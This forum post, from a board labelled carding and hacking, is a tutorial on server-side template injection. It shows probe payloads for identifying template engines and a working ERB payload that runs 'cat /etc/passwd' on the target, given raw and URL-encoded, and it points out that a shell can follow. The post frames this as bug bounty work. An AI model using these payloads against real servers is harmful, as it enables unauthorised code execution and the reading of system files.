Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
Hacking Tools
How to Hack a Server Using SSTI?
Message
<blockquote data-quote="Plotu" data-source="post: 382" data-attributes="member: 5"><p><img src="https://sun9-67.userapi.com/impg/c857024/v857024699/17a1d1/_teHGy7WBcw.jpg?size=807x485&quality=96&sign=70e505262a114214d6095a48f00fffaf&type=album" alt="_teHGy7WBcw.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Today I will tell you what <strong>Server-side template injection </strong>is in practice. I'll show you how to find this vulnerability and untwist it before executing the code on the server. You will also find out why the payments for this vulnerability on BugBounty go up to $ 10,000. It might seem like the vulnerability is difficult to exploit, but it is not. There are many details, but in general it is quite easy to find and promote. Well, what have you driven? Let's look at another interesting vulnerability.</p><p></p><p><strong>What is server-side template injection?</strong></p><p></p><p>For example, when you change your password, the following notification will be sent to the mail: "Username, your password has been changed." This is also a template, as this message is sent to all users, but only with a different username parameter. If a hacker using the template syntax was able to transfer the payload and it was executed on the server side, the application is vulnerable to SSTI.</p><p></p><p>The risk and consequences directly depend on the functionality of the engine. Sometimes SSTI allows you to execute arbitrary code on the server and gain full access on the server. Even if the engine has certain limitations and it is not possible to execute code on the server side, other attacks can be carried out using SSTI, which can lead to leakage of confidential information. Let's take a look at a specific example. For example, we have the functionality of an online store that duplicates the content of an order. Something like this:</p><p></p><p></p><p>The existing template changes the <username> and <order_sum> parameters for a specific user and order amount, respectively. And what will happen if you register a user with the nickname 5 * 5 or {{5 * 5}}. If the template is configured incorrectly, then at the next order we can see the following:</p><p></p><p></p><p>Thus, we see the execution of the code in the <username> parameter on the server side via SSTI. Using a more specific example, I will show how you can unroll this vulnerability and get arbitrary code execution.</p><p></p><p><strong>How do I find the SSTI?</strong></p><p>We need to find the place where the data is returned in the response. This can be an online form, an order page, a profile, etc. After that, you need to try adding different SSTI payloads and get an error or code execution. If we get the answer as in the example, then we get the guaranteed SSTI.</p><p>Code:</p><p>User = Hello $ {7 * 7}</p><p>Hello 49</p><p>Errors can be thrown when the expression is not built correctly. This may also hint at SSTI. Something like this can be obtained from the Ruby ERB engine:</p><p>Code:</p><p>(erb): 1: in `<main> ': undefined local variable or method` foobar' for main: Object (NameError)</p><p>from /usr/lib/ruby/2.5.0/erb.rb:876:in `eval '</p><p>from /usr/lib/ruby/2.5.0/erb.rb:876:in `result '</p><p>from -e: 4: in `<main> '</p><p>Next, you need to determine what kind of engine is used among the existing templates FreeMarker, Velocity, Smarty, Twig, Twig (sandboxed) and Jade. There is a hint picture that allows you to determine the names of the template based on the results of execution. Here are the most popular options, in case there are any other errors, google to help.</p><p></p><p><img src="https://sun9-30.userapi.com/impg/c857528/v857528699/22d0c9/sbtnBi-vNIQ.jpg?size=768x463&quality=96&sign=a0e4aed60263656a32acdf6732a50dea&type=album" alt="Defining the engine template" class="fr-fic fr-dii fr-draggable " style="" /></p><p>Defining the engine template</p><p></p><p><strong>Exploiting the real SSTI</strong></p><p>Let's promote SSTI in practice. Let's imagine that we have an online store and when going to one of the pages, this is the request in the URL:</p><p>Code:</p><p><a href="https://internetshop.com/?message=Object" target="_blank">https://internetshop.com/?message=Object</a> is not found</p><p>Then we try to pass the parameter and get the display of the result on the page.</p><p>Code:</p><p>[URL unfurl="true"]https://internetshop.com/?message=SSTI[/URL]</p><p>Then SSTI appears on the page. Great, potentially we found an SSTI. You need to figure out what the template is and get the code execution on the server side. Next, we load the entire list of potential payloads and analyze the response. Automation can be done with BurpSuite Intruder. You can see the list of my payloads in the screenshot, the link has a more detailed list for all engines.</p><p></p><p><img src="https://sun9-2.userapi.com/impg/c857436/v857436699/22c1b9/tIy_qW7w9pM.jpg?size=807x286&quality=96&sign=51eb750c40ed5b76132635acdb2a5fa8&type=album" alt="tIy_qW7w9pM.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>We get the answer that the payload <% = 7 * 7%> worked and the page displays the executed result 49. To check, you can insert our payload into the request and look at the page. The payload itself will be URL-encode encoded.</p><p>Code:</p><p>[URL unfurl="true"]https://internetshop.com/?message=%3c%%3d%207%2a7%20%%3e[/URL]</p><p>Next, we find that the payload "<% = 7 * 7%>" is the syntax of the ERB engine. We are looking for a payload to execute system commands:</p><p>Code:</p><p><% = system ("cat / etc / passwd")%></p><p><a href="https://internetshop.com/?message=" target="_blank">https://internetshop.com/?message=</a><%= system ("cat / etc / passwd")%></p><p>Let's execute the URL-encode and our final payload will look like this:</p><p>Code:</p><p><a href="https://internetshop.com/?message=%3c%25%3d%20%73%79%73%74%65%6d%28%22%63%61%74%20%2f%65%74%" target="_blank">https://internetshop.com/?message=<%= system("cat /et%</a> 63% 2f% 70% 61% 73% 73% 77% 64% 22% 29% 20% 25% 3e</p><p><img src="https://sun9-6.userapi.com/impg/c857436/v857436699/22c1cb/x2a-gcxzpWA.jpg?size=769x522&quality=96&sign=71e635079cab582027d4013303e67caf&type=album" alt="x2a-gcxzpWA.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p>Contents of the / etc / passwd file</p><p></p><p>We got server side code executions through SSTI. The screenshot above shows the contents of the / etc / passwd file. Further, you can get a shell or read the contents of some other files. It all depends on the goals and objectives.</p><p></p><p><strong>How much does BugBounty pay for SSTIs?</strong></p><p>SSTIs are less common in BugBounty reports. The remuneration ranges from $ 1,000 to $ 10,000. Maximum payouts are assigned for Server-side template injection, which results in remote code execution. We will analyze these two examples in this article.</p><p></p><p>The first example was found in the bugbounty Uber program. The user with the nickname Orange changed his nickname on the uber.com website to {{'7' * 7}} and received "77777777" in an email. This suggests that the system is vulnerable to SSTI (Jinja2 template). The hacker received a $ 10,000 reward for this vulnerability.</p><p></p><p><img src="https://sun9-86.userapi.com/impg/c857528/v857528699/22d0db/iorTZbtwlWQ.jpg?size=807x457&quality=96&sign=05d6376a5d9d335676d27d79e131523e&type=album" alt="iorTZbtwlWQ.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><img src="https://sun9-81.userapi.com/impg/c857528/v857528699/22d0e4/QP9qe0nbOdA.jpg?size=807x203&quality=96&sign=368b79037da15c76f90f0bba8838bfd3&type=album" alt="QP9qe0nbOdA.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p>BugBounty Uber Program</p><p></p><p>The second example was found in the Shopify program. Operation is much more difficult than the first example. The user tried to modify the standard send template and was able to get the template change and get more information. Such a find brought the hacker $ 10,000.</p><p></p><p><img src="https://sun9-45.userapi.com/impg/c857528/v857528699/22d0ed/05VwULAdusc.jpg?size=807x303&quality=96&sign=91bf945d0fc0d77712744c72ff06ee20&type=album" alt="05VwULAdusc.jpg" class="fr-fic fr-dii fr-draggable " style="" /></p><p>BugBounty Shopify program</p><p></p><p><strong>Conclusion</strong></p><p>Server-side template injection is a fairly serious vulnerability. Through SSTI, you can get full control over the server, which we discussed today with specific examples. Template engines will continue to gain traction. Therefore, it will potentially be possible to meet even more reports from bugbounty platforms.</p></blockquote><p></p>
[QUOTE="Plotu, post: 382, member: 5"] [IMG alt="_teHGy7WBcw.jpg"]https://sun9-67.userapi.com/impg/c857024/v857024699/17a1d1/_teHGy7WBcw.jpg?size=807x485&quality=96&sign=70e505262a114214d6095a48f00fffaf&type=album[/IMG] Today I will tell you what [B]Server-side template injection [/B]is in practice. I'll show you how to find this vulnerability and untwist it before executing the code on the server. You will also find out why the payments for this vulnerability on BugBounty go up to $ 10,000. It might seem like the vulnerability is difficult to exploit, but it is not. There are many details, but in general it is quite easy to find and promote. Well, what have you driven? Let's look at another interesting vulnerability. [B]What is server-side template injection?[/B] For example, when you change your password, the following notification will be sent to the mail: "Username, your password has been changed." This is also a template, as this message is sent to all users, but only with a different username parameter. If a hacker using the template syntax was able to transfer the payload and it was executed on the server side, the application is vulnerable to SSTI. The risk and consequences directly depend on the functionality of the engine. Sometimes SSTI allows you to execute arbitrary code on the server and gain full access on the server. Even if the engine has certain limitations and it is not possible to execute code on the server side, other attacks can be carried out using SSTI, which can lead to leakage of confidential information. Let's take a look at a specific example. For example, we have the functionality of an online store that duplicates the content of an order. Something like this: The existing template changes the <username> and <order_sum> parameters for a specific user and order amount, respectively. And what will happen if you register a user with the nickname 5 * 5 or {{5 * 5}}. If the template is configured incorrectly, then at the next order we can see the following: Thus, we see the execution of the code in the <username> parameter on the server side via SSTI. Using a more specific example, I will show how you can unroll this vulnerability and get arbitrary code execution. [B]How do I find the SSTI?[/B] We need to find the place where the data is returned in the response. This can be an online form, an order page, a profile, etc. After that, you need to try adding different SSTI payloads and get an error or code execution. If we get the answer as in the example, then we get the guaranteed SSTI. Code: User = Hello $ {7 * 7} Hello 49 Errors can be thrown when the expression is not built correctly. This may also hint at SSTI. Something like this can be obtained from the Ruby ERB engine: Code: (erb): 1: in `<main> ': undefined local variable or method` foobar' for main: Object (NameError) from /usr/lib/ruby/2.5.0/erb.rb:876:in `eval ' from /usr/lib/ruby/2.5.0/erb.rb:876:in `result ' from -e: 4: in `<main> ' Next, you need to determine what kind of engine is used among the existing templates FreeMarker, Velocity, Smarty, Twig, Twig (sandboxed) and Jade. There is a hint picture that allows you to determine the names of the template based on the results of execution. Here are the most popular options, in case there are any other errors, google to help. [IMG alt="Defining the engine template"]https://sun9-30.userapi.com/impg/c857528/v857528699/22d0c9/sbtnBi-vNIQ.jpg?size=768x463&quality=96&sign=a0e4aed60263656a32acdf6732a50dea&type=album[/IMG] Defining the engine template [B]Exploiting the real SSTI[/B] Let's promote SSTI in practice. Let's imagine that we have an online store and when going to one of the pages, this is the request in the URL: Code: [URL]https://internetshop.com/?message=Object[/URL] is not found Then we try to pass the parameter and get the display of the result on the page. Code: [URL unfurl="true"]https://internetshop.com/?message=SSTI[/URL] Then SSTI appears on the page. Great, potentially we found an SSTI. You need to figure out what the template is and get the code execution on the server side. Next, we load the entire list of potential payloads and analyze the response. Automation can be done with BurpSuite Intruder. You can see the list of my payloads in the screenshot, the link has a more detailed list for all engines. [IMG alt="tIy_qW7w9pM.jpg"]https://sun9-2.userapi.com/impg/c857436/v857436699/22c1b9/tIy_qW7w9pM.jpg?size=807x286&quality=96&sign=51eb750c40ed5b76132635acdb2a5fa8&type=album[/IMG] We get the answer that the payload <% = 7 * 7%> worked and the page displays the executed result 49. To check, you can insert our payload into the request and look at the page. The payload itself will be URL-encode encoded. Code: [URL unfurl="true"]https://internetshop.com/?message=%3c%%3d%207%2a7%20%%3e[/URL] Next, we find that the payload "<% = 7 * 7%>" is the syntax of the ERB engine. We are looking for a payload to execute system commands: Code: <% = system ("cat / etc / passwd")%> [URL]https://internetshop.com/?message=[/URL]<%= system ("cat / etc / passwd")%> Let's execute the URL-encode and our final payload will look like this: Code: [URL]https://internetshop.com/?message=%3c%25%3d%20%73%79%73%74%65%6d%28%22%63%61%74%20%2f%65%74%[/URL] 63% 2f% 70% 61% 73% 73% 77% 64% 22% 29% 20% 25% 3e [IMG alt="x2a-gcxzpWA.jpg"]https://sun9-6.userapi.com/impg/c857436/v857436699/22c1cb/x2a-gcxzpWA.jpg?size=769x522&quality=96&sign=71e635079cab582027d4013303e67caf&type=album[/IMG] Contents of the / etc / passwd file We got server side code executions through SSTI. The screenshot above shows the contents of the / etc / passwd file. Further, you can get a shell or read the contents of some other files. It all depends on the goals and objectives. [B]How much does BugBounty pay for SSTIs?[/B] SSTIs are less common in BugBounty reports. The remuneration ranges from $ 1,000 to $ 10,000. Maximum payouts are assigned for Server-side template injection, which results in remote code execution. We will analyze these two examples in this article. The first example was found in the bugbounty Uber program. The user with the nickname Orange changed his nickname on the uber.com website to {{'7' * 7}} and received "77777777" in an email. This suggests that the system is vulnerable to SSTI (Jinja2 template). The hacker received a $ 10,000 reward for this vulnerability. [IMG alt="iorTZbtwlWQ.jpg"]https://sun9-86.userapi.com/impg/c857528/v857528699/22d0db/iorTZbtwlWQ.jpg?size=807x457&quality=96&sign=05d6376a5d9d335676d27d79e131523e&type=album[/IMG] [IMG alt="QP9qe0nbOdA.jpg"]https://sun9-81.userapi.com/impg/c857528/v857528699/22d0e4/QP9qe0nbOdA.jpg?size=807x203&quality=96&sign=368b79037da15c76f90f0bba8838bfd3&type=album[/IMG] BugBounty Uber Program The second example was found in the Shopify program. Operation is much more difficult than the first example. The user tried to modify the standard send template and was able to get the template change and get more information. Such a find brought the hacker $ 10,000. [IMG alt="05VwULAdusc.jpg"]https://sun9-45.userapi.com/impg/c857528/v857528699/22d0ed/05VwULAdusc.jpg?size=807x303&quality=96&sign=91bf945d0fc0d77712744c72ff06ee20&type=album[/IMG] BugBounty Shopify program [B]Conclusion[/B] Server-side template injection is a fairly serious vulnerability. Through SSTI, you can get full control over the server, which we discussed today with specific examples. Template engines will continue to gain traction. Therefore, it will potentially be possible to meet even more reports from bugbounty platforms. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
Hacking Tools
How to Hack a Server Using SSTI?
Top